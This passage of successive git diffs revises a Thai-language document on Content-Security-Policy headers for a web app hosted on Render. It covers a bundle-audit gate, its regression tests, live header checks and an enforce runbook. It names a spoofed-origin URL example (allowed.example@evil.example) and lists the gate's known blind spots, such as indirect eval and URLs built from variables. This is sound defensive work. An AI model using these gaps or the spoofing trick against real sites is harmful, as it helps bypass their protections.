+enforce ไม่ติดเลยทั้งที่ทุกคนเชื่อว่าติดแล้ว — **หลัง deploy ต้องรัน `verify-live-headers.mjs`
+แล้วดู header จริงทุกครั้ง ห้ามถือว่า merge แล้วจบ** และถ้า blueprint ไม่ตาม ต้อง Sync จาก
+Render dashboard ก่อน
+
+**ข้อมูลทดสอบที่ยังค้างใน production (ต้องเก็บกวาด)** — ทั้งสองรายการ **ปิดใช้งานแล้ว** แต่เป็น
+soft delete จึงยังอยู่ใน DB และมีร่องรอยใน audit log:
+`personnel` ชื่อขึ้นต้น `ทดสอบCSP` · `multiplier_areas` จังหวัดขึ้นต้น `ทดสอบCSP-`
+
 ## การทดสอบ
 
 - `frontend/src/__tests__/securityHeaders.test.js` — assert header set ข้างต้นในทั้ง
@@ -279,6 +352,10 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
   source of truth — แก้ render.yaml แล้ว gate ตามอัตโนมัติ) exit 1 เมื่อพบ drift;
   regression อยู่ที่ `scripts/tests/verify-live-headers.test.mjs` (mock origin บน
   127.0.0.1 ไม่พึ่งเครือข่าย) เสียบใน `scripts/ci-local.sh` / `.ps1` แล้ว
+  **ตัวสคริปต์เองไม่ได้อยู่ใน gate อัตโนมัติใด ๆ** เพราะยิง production จริง — เรียกมือเท่านั้น
+  (เช่นเดียวกับ `csp-report-selftest.mjs` ด้านล่าง) · **ผลตามมาที่วัดได้จริง 22 ส.ค.:** drift ของ
+  `Cache-Control` เกิดขึ้นโดยไม่มีอะไรแดงเลยระหว่าง 21→22 ส.ค. เพราะไม่มีใครรันมันในช่วงนั้น —
+  ถ้าจะพึ่ง gate นี้เป็นตาข่ายจริง ต้องมีคนรันตามรอบ ไม่ใช่รันตอนนึกได้
 - `scripts/csp-report-selftest.mjs` — ยิง CSP report marker สดเข้า pipeline จริง (issue #113):
   warm up `/api/readyz` ก่อน แล้ว POST `/api/csp-report` ผ่าน rewrite เส้นเดียวกับที่ browser ใช้
   exit 0 เมื่อได้ 204 พร้อมพิมพ์บรรทัด log ที่ต้องไปค้นหา (ผูกกับข้อความ `error_log()` จริงใน
@@ -333,7 +410,7 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (67 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (69 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
   · **differential**: `scripts/tests/audit-bundle-csp.differential.test.mjs` — ไม่ระบุคำตอบที่ถูกเอง
   แต่ถาม **แหล่งความจริงเดียวกับที่ browser ใช้** แล้วเทียบว่า gate เห็นตรงกันไหม: `parse5`

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -265,7 +265,9 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   `VITE_API_URL` แบบ absolute ซึ่งเป็นเคสที่ gate นี้มีไว้จับโดยตรง) · **ข้อจำกัดที่รู้ตัว**:
   URL ที่ประกอบจากตัวแปร (`fetch(base + path)`) มองไม่เห็น — allowlist รวมยังคุมสตริงลอยอีกชั้น
   · absolute URL ที่บอกบริบทไม่ได้ เทียบกับ allowlist รวม และรายงาน directive ที่เทียบตาม
-  policy จริง · `url()` ภายนอกใน stylesheet **ทุกที่ที่เจอ ไม่ใช่เฉพาะไฟล์ `.css`** (`<style>` ใน HTML และ
+  policy จริง โดย **host ถูกตัดสินด้วย URL parser ไม่ใช่ character class** — `_` ในชื่อ host,
+  userinfo (`https://allowed.example@evil.example/`) และ IPv6 literal จึงไม่ทำให้ origin
+  ถูกอ่านผิดเป็นตัวที่ policy อนุญาต · `url()` ภายนอกใน stylesheet **ทุกที่ที่เจอ ไม่ใช่เฉพาะไฟล์ `.css`** (`<style>` ใน HTML และ
   CSS-in-JS ก็โหลดจริง) **รวมรูป protocol-relative `url(//host/…)`** ซึ่ง browser เติม scheme
   ของหน้าเว็บให้ · เช่นเดียวกับ **ค่าของ attribute ที่เป็น URL** (`src` / `href` / `srcset` /
   `poster` / `data` / `action` / `formaction`) — `<img src="//host">` คือบริบทที่บอกว่าเป็น URL
@@ -276,7 +278,7 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (51 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (57 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
 - ตรวจจากภายนอกหลัง deploy:
   ```bash

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -121,6 +121,9 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
 3. วิธี enforce: ใน `render.yaml` เปลี่ยน key `Content-Security-Policy-Report-Only`
    เป็น `Content-Security-Policy` (ค่าเดิม ตัด `report-uri` หรือไว้ต่อก็ได้)
    แล้วอัปเดตเทส `securityHeaders.test.js`
+   · **ขั้นตอนเต็มของวันกดสวิตช์อยู่ที่ [`docs/runbooks/csp-enforce-switch.md`](./runbooks/csp-enforce-switch.md)**
+   — รวมตารางเช็คว่าหลักฐานครบหรือยัง, การยืนยันว่า header เปลี่ยนจริงบน live (blueprint ของ
+   Render เคยตามหลัง repo มาแล้ว ดู Evidence check 2026-08-22) และขั้นตอนย้อนกลับ
 
 ### Baseline check 2026-08-17 (~14:24–14:45 UTC) — วันที่ headers live วันแรก
 

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -193,8 +193,13 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   "log ว่าง" แปลว่า "ยังไม่มีใครลอง" ไม่ใช่ "ปลอดภัย" → ก่อน enforce ให้เดินคลิกครบหน้าหลัก
   (dashboard / personnel / profile ที่มีรูป / import / ocr) โดยเปิด DevTools console ดู
   violation ตรง ๆ อย่างน้อย 1 รอบ — วิธีนี้ไม่ต้องพึ่ง Render log เลย
-- **static audit ของ bundle production จริง** (entry + **6 จาก ~24** route chunks + CSS
-  ที่ดึงจาก production ไม่ใช่ build ในเครื่อง) ไม่พบสิ่งที่จะชน policy:
+- **static audit ของ bundle — ตอนนี้เป็นสคริปต์อัตโนมัติที่ตรวจครบทุกไฟล์แล้ว**
+  (`scripts/audit-bundle-csp.mjs` · issue #113 R2) การตรวจรอบ 17 ส.ค. ด้านล่างเป็นการอ่านด้วยตา
+  ที่ครอบแค่ **6 จาก ~24 route chunk ตามที่เข้าใจตอนนั้น** — วัดจริงภายหลังพบว่า build ปัจจุบันมี
+  **74 ไฟล์** จึงเหลืออีกมากที่ไม่เคยถูกตรวจเลย และไม่มีอะไรกัน chunk ใหม่ที่พาของต้องห้ามเข้ามา
+  · **รอบแรกที่รันสคริปต์จับได้ทันที**: `https://tailwindcss.com` ใน CSS bundle ซึ่งการอ่านด้วยตา
+  มองข้ามไป (ตรวจแล้วเป็นคอมเมนต์ลิขสิทธิ์ ไม่ใช่การโหลดจริง จึงอยู่ใน allowlist พร้อมเหตุผล)
+  · ตารางด้านล่างคือสิ่งที่วัดได้ตอนนั้น เก็บไว้เป็นบันทึก — **ของจริงที่บังคับใช้คือสคริปต์**:
 
   | Directive | ที่วัดได้ |
   |---|---|
@@ -242,6 +247,16 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   token อ่านจาก env เท่านั้น ไม่รับผ่าน argument; regression อยู่ที่
   `scripts/tests/check-csp-violations.test.mjs` · **ตัวสคริปต์ไม่อยู่ใน CI gate** เพราะยิง production จริง
   · ขั้นตอนเปิดใช้บน production: `docs/runbooks/csp-counter-activation.md`
+- `scripts/audit-bundle-csp.mjs` — gate ตรวจ build output ว่ามีอะไรที่ policy จะบล็อกหลัง enforce
+  ไหม (issue #113 R2): อ่าน CSP จาก `render.yaml` แล้วสแกน `frontend/dist` **ทุกไฟล์** (ปัจจุบัน 74)
+  — กฎผูกกับ directive จริง ไม่ hardcode: inline script/event handler (`script-src`) · `eval(`
+  และ `new Function(` (`script-src`) · absolute URL นอก allowlist (`connect-src`/`img-src`/`font-src`)
+  · `url()` ภายนอกใน CSS · **ไฟล์ font ใน bundle เมื่อ `font-src` ไม่มี `'self'`** (ความเสี่ยงข้อ 2
+  ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
+  · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
+  · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (18 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
 - ตรวจจากภายนอกหลัง deploy:
   ```bash
   curl -sI https://smart-port.onrender.com/ | grep -i "content-security\|x-frame\|referrer\|permissions\|strict-transport"

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -321,14 +321,19 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
   CSS-in-JS ก็โหลดจริง) **รวมรูป protocol-relative `url(//host/…)`** ซึ่ง browser เติม scheme
   ของหน้าเว็บให้ · เช่นเดียวกับ **ค่าของ attribute ที่เป็น URL** (`src` / `href` / `srcset` /
   `poster` / `data` / `action` / `formaction`) — `<img src="//host">` คือบริบทที่บอกว่าเป็น URL
-  ชัดกว่า `url()` ด้วยซ้ำ · **ข้อจำกัดที่รู้ตัว**: `//host` จับเฉพาะสามบริบทนี้เท่านั้น
+  ชัดกว่า `url()` ด้วยซ้ำ · **คู่แท็ก+attribute ที่ CSP รู้ directive แน่นอน เทียบกับ directive
+  นั้นโดยตรง ไม่ใช่ allowlist รวม** (`<script src>` → `script-src` · `<img src>` → `img-src` ฯลฯ
+  พร้อม fallback ไป `default-src` ตามที่ browser ทำ) ไม่งั้น origin ที่อนุญาตไว้โหลดฟอนต์
+  จะกลายเป็นใบผ่านให้โหลดสคริปต์ · คู่ที่กำกวม (`<source src>` ซึ่งเป็น `img-src` ใน `<picture>`
+  แต่ `media-src` ใน `<video>`) ไม่อยู่ในตาราง map และใช้ allowlist รวมตามเดิม
+  · **ข้อจำกัดที่รู้ตัว**: `//host` จับเฉพาะสามบริบทนี้เท่านั้น
   สตริงลอย ๆ ไม่ถูกตรวจ เพราะไล่จับทุกที่แล้วชนโค้ดปกติ (วัดกับ build จริงแล้วได้ `//i.test`
   จาก regex literal ที่ bundler ลากมา)
   · **ไฟล์ font ใน bundle เมื่อ `font-src` ไม่มี `'self'`** (ความเสี่ยงข้อ 2
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (62 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (67 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
   · **differential**: `scripts/tests/audit-bundle-csp.differential.test.mjs` — ไม่ระบุคำตอบที่ถูกเอง
   แต่ถาม **แหล่งความจริงเดียวกับที่ browser ใช้** แล้วเทียบว่า gate เห็นตรงกันไหม: `parse5`

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -193,10 +193,15 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   "log ว่าง" แปลว่า "ยังไม่มีใครลอง" ไม่ใช่ "ปลอดภัย" → ก่อน enforce ให้เดินคลิกครบหน้าหลัก
   (dashboard / personnel / profile ที่มีรูป / import / ocr) โดยเปิด DevTools console ดู
   violation ตรง ๆ อย่างน้อย 1 รอบ — วิธีนี้ไม่ต้องพึ่ง Render log เลย
-- **static audit ของ bundle — ตอนนี้เป็นสคริปต์อัตโนมัติที่ตรวจครบทุกไฟล์แล้ว**
+- **static audit ของ bundle — ตอนนี้เป็นสคริปต์อัตโนมัติแล้ว**
   (`scripts/audit-bundle-csp.mjs` · issue #113 R2) การตรวจรอบ 17 ส.ค. ด้านล่างเป็นการอ่านด้วยตา
   ที่ครอบแค่ **6 จาก ~24 route chunk ตามที่เข้าใจตอนนั้น** — วัดจริงภายหลังพบว่า build ปัจจุบันมี
-  **74 ไฟล์** จึงเหลืออีกมากที่ไม่เคยถูกตรวจเลย และไม่มีอะไรกัน chunk ใหม่ที่พาของต้องห้ามเข้ามา
+  **74 ไฟล์** (65 JS chunk + 4 CSS + 2 HTML + 3 อื่น ๆ) จึงเหลืออีกมากที่ไม่เคยถูกตรวจเลย
+  และไม่มีอะไรกัน chunk ใหม่ที่พาของต้องห้ามเข้ามา · สคริปต์ปัจจุบัน **อ่านเนื้อหา 72 ไฟล์ และข้าม 2
+  พร้อมพิมพ์เหตุผลรายไฟล์ทุกครั้ง** (`import-template.xlsx` = binary · `_redirects` = ไฟล์ตั้งค่าของ
+  Render edge ที่ browser ไม่เคยโหลด) — **ตัวเลข "ข้าม" ถูกพิมพ์เสมอโดยตั้งใจ** เพราะ code review
+  จับได้ว่ารุ่นแรกนับไฟล์ที่ไม่เคยเปิดรวมเข้าไปในคำว่า "ตรวจแล้ว" ซึ่งคือ "ไม่ได้ตรวจ" ที่ถูกรายงาน
+  เป็น "ตรวจแล้วสะอาด"
   · **รอบแรกที่รันสคริปต์จับได้ทันที**: `https://tailwindcss.com` ใน CSS bundle ซึ่งการอ่านด้วยตา
   มองข้ามไป (ตรวจแล้วเป็นคอมเมนต์ลิขสิทธิ์ ไม่ใช่การโหลดจริง จึงอยู่ใน allowlist พร้อมเหตุผล)
   · ตารางด้านล่างคือสิ่งที่วัดได้ตอนนั้น เก็บไว้เป็นบันทึก — **ของจริงที่บังคับใช้คือสคริปต์**:
@@ -248,9 +253,13 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   `scripts/tests/check-csp-violations.test.mjs` · **ตัวสคริปต์ไม่อยู่ใน CI gate** เพราะยิง production จริง
   · ขั้นตอนเปิดใช้บน production: `docs/runbooks/csp-counter-activation.md`
 - `scripts/audit-bundle-csp.mjs` — gate ตรวจ build output ว่ามีอะไรที่ policy จะบล็อกหลัง enforce
-  ไหม (issue #113 R2): อ่าน CSP จาก `render.yaml` แล้วสแกน `frontend/dist` **ทุกไฟล์** (ปัจจุบัน 74)
+  ไหม (issue #113 R2): อ่าน CSP จาก `render.yaml` (path `/*` เท่านั้น รองรับทั้งชื่อ enforce และ
+  report-only) แล้วสแกน `frontend/dist` — **อ่านทุกไฟล์ที่ไม่ใช่ binary รวมถึงไฟล์ที่ไม่มีนามสกุล**
+  และพิมพ์รายชื่อไฟล์ที่ข้ามพร้อมเหตุผลทุกครั้ง
   — กฎผูกกับ directive จริง ไม่ hardcode: inline script/event handler (`script-src`) · `eval(`
-  และ `new Function(` (`script-src`) · absolute URL นอก allowlist (`connect-src`/`img-src`/`font-src`)
+  และ `Function(` (`script-src` — **ข้อจำกัดที่รู้ตัว**: indirect eval แบบ `(0,eval)()` regex
+  จับไม่ได้ gate นี้ลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี) · absolute URL นอก allowlist
+  (`connect-src`/`img-src`/`font-src`)
   · `url()` ภายนอกใน CSS · **ไฟล์ font ใน bundle เมื่อ `font-src` ไม่มี `'self'`** (ความเสี่ยงข้อ 2
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -258,13 +258,19 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   และพิมพ์รายชื่อไฟล์ที่ข้ามพร้อมเหตุผลทุกครั้ง
   — กฎผูกกับ directive จริง ไม่ hardcode: inline script/event handler (`script-src`) · `eval(`
   และ `Function(` (`script-src` — **ข้อจำกัดที่รู้ตัว**: indirect eval แบบ `(0,eval)()` regex
-  จับไม่ได้ gate นี้ลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี) · absolute URL นอก allowlist
-  (`connect-src`/`img-src`/`font-src`)
-  · `url()` ภายนอกใน CSS · **ไฟล์ font ใน bundle เมื่อ `font-src` ไม่มี `'self'`** (ความเสี่ยงข้อ 2
+  จับไม่ได้ gate นี้ลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี)
+  · **URL ที่รู้ว่าถูกเรียกจริง** (argument ของ `fetch()` / `axios` / `XHR.open()` ที่เป็น string
+  literal) เทียบกับ **`connect-src` เท่านั้น** — ไม่ใช่ allowlist รวมทุก directive ไม่งั้น origin
+  ที่ policy อนุญาตไว้เพื่อโหลดฟอนต์จะกลายเป็นใบผ่านให้ยิง API (ความเสี่ยงข้อ 1 ด้านบน คือ
+  `VITE_API_URL` แบบ absolute ซึ่งเป็นเคสที่ gate นี้มีไว้จับโดยตรง) · **ข้อจำกัดที่รู้ตัว**:
+  URL ที่ประกอบจากตัวแปร (`fetch(base + path)`) มองไม่เห็น — allowlist รวมยังคุมสตริงลอยอีกชั้น
+  · absolute URL ที่บอกบริบทไม่ได้ เทียบกับ allowlist รวม และรายงาน directive ที่เทียบตาม
+  policy จริง · `url()` ภายนอกใน CSS **รวมรูป protocol-relative `url(//host/…)`**
+  · **ไฟล์ font ใน bundle เมื่อ `font-src` ไม่มี `'self'`** (ความเสี่ยงข้อ 2
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (18 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (35 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
 - ตรวจจากภายนอกหลัง deploy:
   ```bash

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -276,7 +276,7 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (45 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (51 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
 - ตรวจจากภายนอกหลัง deploy:
   ```bash

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -265,12 +265,15 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   `VITE_API_URL` แบบ absolute ซึ่งเป็นเคสที่ gate นี้มีไว้จับโดยตรง) · **ข้อจำกัดที่รู้ตัว**:
   URL ที่ประกอบจากตัวแปร (`fetch(base + path)`) มองไม่เห็น — allowlist รวมยังคุมสตริงลอยอีกชั้น
   · absolute URL ที่บอกบริบทไม่ได้ เทียบกับ allowlist รวม และรายงาน directive ที่เทียบตาม
-  policy จริง · `url()` ภายนอกใน CSS **รวมรูป protocol-relative `url(//host/…)`**
+  policy จริง · `url()` ภายนอกใน stylesheet **ทุกที่ที่เจอ ไม่ใช่เฉพาะไฟล์ `.css`** (`<style>` ใน HTML และ
+  CSS-in-JS ก็โหลดจริง) **รวมรูป protocol-relative `url(//host/…)`** ซึ่ง browser เติม scheme
+  ของหน้าเว็บให้ · **ข้อจำกัดที่รู้ตัว**: `//host` จับเฉพาะที่มีบริบทบอกว่าเป็น URL (ใน `url()` หรือ
+  argument ของ fetch/XHR) สตริงลอย ๆ ไม่ถูกตรวจ เพราะไล่จับทุกที่แล้วชนโค้ดปกติ
   · **ไฟล์ font ใน bundle เมื่อ `font-src` ไม่มี `'self'`** (ความเสี่ยงข้อ 2
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (35 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (39 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
 - ตรวจจากภายนอกหลัง deploy:
   ```bash

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -394,7 +394,11 @@ soft delete จึงยังอยู่ใน DB และมีร่อง�
   `VITE_API_URL` แบบ absolute ซึ่งเป็นเคสที่ gate นี้มีไว้จับโดยตรง) · **ข้อจำกัดที่รู้ตัว**:
   URL ที่ประกอบจากตัวแปร (`fetch(base + path)`) มองไม่เห็น — allowlist รวมยังคุมสตริงลอยอีกชั้น
   · absolute URL ที่บอกบริบทไม่ได้ เทียบกับ allowlist รวม และรายงาน directive ที่เทียบตาม
-  policy จริง โดย **host ถูกตัดสินด้วย URL parser ไม่ใช่ character class** — `_` ในชื่อ host,
+  policy จริง — **allowlist รวมนับเฉพาะ directive ที่คุมการโหลด resource** เท่านั้น
+  (`frame-ancestors` คุมว่าใคร embed *เรา* ได้ · `form-action` คุมปลายทาง submit · `base-uri`
+  คุมค่า `<base href>` — ทั้งสามไม่ได้อนุญาตให้ bundle โหลดอะไร จึงไม่ยืม origin ให้ใคร
+  ดู `NON_FETCH_DIRECTIVES` ซึ่งเป็น blocklist ชุดปิดตาม spec ไม่ใช่รายชื่อ fetch directive
+  ที่งอกใหม่ได้) · โดย **host ถูกตัดสินด้วย URL parser ไม่ใช่ character class** — `_` ในชื่อ host,
   userinfo ทุกรูป (`https://allowed.example@evil.example/` และรูปที่มี `, ; ( ) { }` คั่น
   ซึ่งเป็นอักขระที่อยู่ในส่วน userinfo ได้) และ IPv6 literal จึงไม่ทำให้ origin ถูกอ่านผิด
   เป็นตัวที่ policy อนุญาต · regex ทำหน้าที่แค่คว้าก้อนที่น่าจะเป็น URL เท่านั้น · `url()` ภายนอกใน stylesheet **ทุกที่ที่เจอ ไม่ใช่เฉพาะไฟล์ `.css`** (`<style>` ใน HTML และ
@@ -403,7 +407,8 @@ soft delete จึงยังอยู่ใน DB และมีร่อง�
   `poster` / `data` / `action` / `formaction`) — `<img src="//host">` คือบริบทที่บอกว่าเป็น URL
   ชัดกว่า `url()` ด้วยซ้ำ · **คู่แท็ก+attribute ที่ CSP รู้ directive แน่นอน เทียบกับ directive
   นั้นโดยตรง ไม่ใช่ allowlist รวม** (`<script src>` → `script-src` · `<img src>` → `img-src` ฯลฯ
-  พร้อม fallback ไป `default-src` ตามที่ browser ทำ) ไม่งั้น origin ที่อนุญาตไว้โหลดฟอนต์
+  พร้อม fallback ไป `default-src` ตามที่ browser ทำ — **เฉพาะ fetch directive**: `form-action`
+  ที่ไม่ได้ประกาศแปลว่า "ไม่จำกัดปลายทางการ submit" ไม่ใช่ "จำกัดเท่า `default-src`") ไม่งั้น origin ที่อนุญาตไว้โหลดฟอนต์
   จะกลายเป็นใบผ่านให้โหลดสคริปต์ · คู่ที่กำกวม (`<source src>` ซึ่งเป็น `img-src` ใน `<picture>`
   แต่ `media-src` ใน `<video>`) ไม่อยู่ในตาราง map และใช้ allowlist รวมตามเดิม
   · **ข้อจำกัดที่รู้ตัว**: `//host` จับเฉพาะสามบริบทนี้เท่านั้น
@@ -413,7 +418,19 @@ soft delete จึงยังอยู่ใน DB และมีร่อง�
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (69 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  โดย wrapper แยก **สามสถานะ** ไม่ใช่ดูแค่ว่ามี `dist` ไหม: ขั้น frontend ล้ม = **fail** (dist ที่
+  เหลืออยู่เป็นของรอบก่อน ตรวจแทนกันไม่ได้ — ของเดิมรัน audit กับมันแล้วขึ้น `OK`) โดยนับ
+  **vitest ตกด้วย ไม่ใช่เฉพาะ build ล้ม**: `ci-local.sh` เช็กสถานะทีละคำสั่งเอง เพราะ bash ปิด
+  `errexit` ให้ทุกคำสั่งที่เป็นเงื่อนไขของ `if`/`&&`/`||` และปิดทะลุเข้า subshell แม้สั่ง `set -e`
+  ซ้ำข้างใน (เคยทำให้ vitest ตกแล้ว gate ยังเขียว) · สั่ง
+  `--skip-frontend` แต่มี `dist` = ตรวจพร้อมพิมพ์ `WARN` ว่าอาจไม่ตรงกับโค้ดปัจจุบัน ·
+  build สำเร็จ = ตรวจตามปกติ · ทั้งสอง wrapper มี regression ของตัวเองใน workspace จำลอง
+  (`scripts/tests/ci-local-csp-gate.test.mjs`) — เคสฝั่ง bash รันได้ทุกแพลตฟอร์ม แต่เคส
+  ฝั่ง PowerShell รันจริง**เฉพาะ Windows**: `ci-local.ps1` ใช้ path แบบ `\` ทั้งไฟล์ ซึ่ง
+  บน Linux เป็นตัวอักษรในชื่อไฟล์ ไม่ใช่ตัวคั่น เทสจึงข้ามตัวเองเมื่อ
+  `process.platform !== 'win32'` (ยังไม่เคยวัดฝั่ง pwsh บน Linux จริง) — สรุปเทสเขียวบน
+  เครื่อง non-Windows จึงหมายถึง "ฝั่ง bash ถูกตรวจ" ไม่ใช่ "สอง wrapper ถูกตรวจ"
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (79 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
   · **differential**: `scripts/tests/audit-bundle-csp.differential.test.mjs` — ไม่ระบุคำตอบที่ถูกเอง
   แต่ถาม **แหล่งความจริงเดียวกับที่ browser ใช้** แล้วเทียบว่า gate เห็นตรงกันไหม: `parse5`

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -135,8 +135,10 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   "log ว่าง" จะแยกไม่ออกระหว่าง "ไม่มี violation" กับ "report ไม่เคยส่งถึง")
   - **log อยู่ที่ service `smartport-backend` ไม่ใช่ static site `smart-port`** — `error_log()`
     ที่ handler เรียกออก stderr ของ container backend (`Dockerfile:64` ตั้ง `error_log = /dev/stderr`)
-    เปิด log ผิด service จะเห็นว่างเสมอ และ hop สุดท้าย (`error_log` → Render log stream)
-    ยังไม่เคยถูกยืนยันด้วยตา เพราะ session นี้เข้าถึง Render log ไม่ได้
+    เปิด log ผิด service จะเห็นว่างเสมอ · hop สุดท้าย (`error_log` → Render log stream)
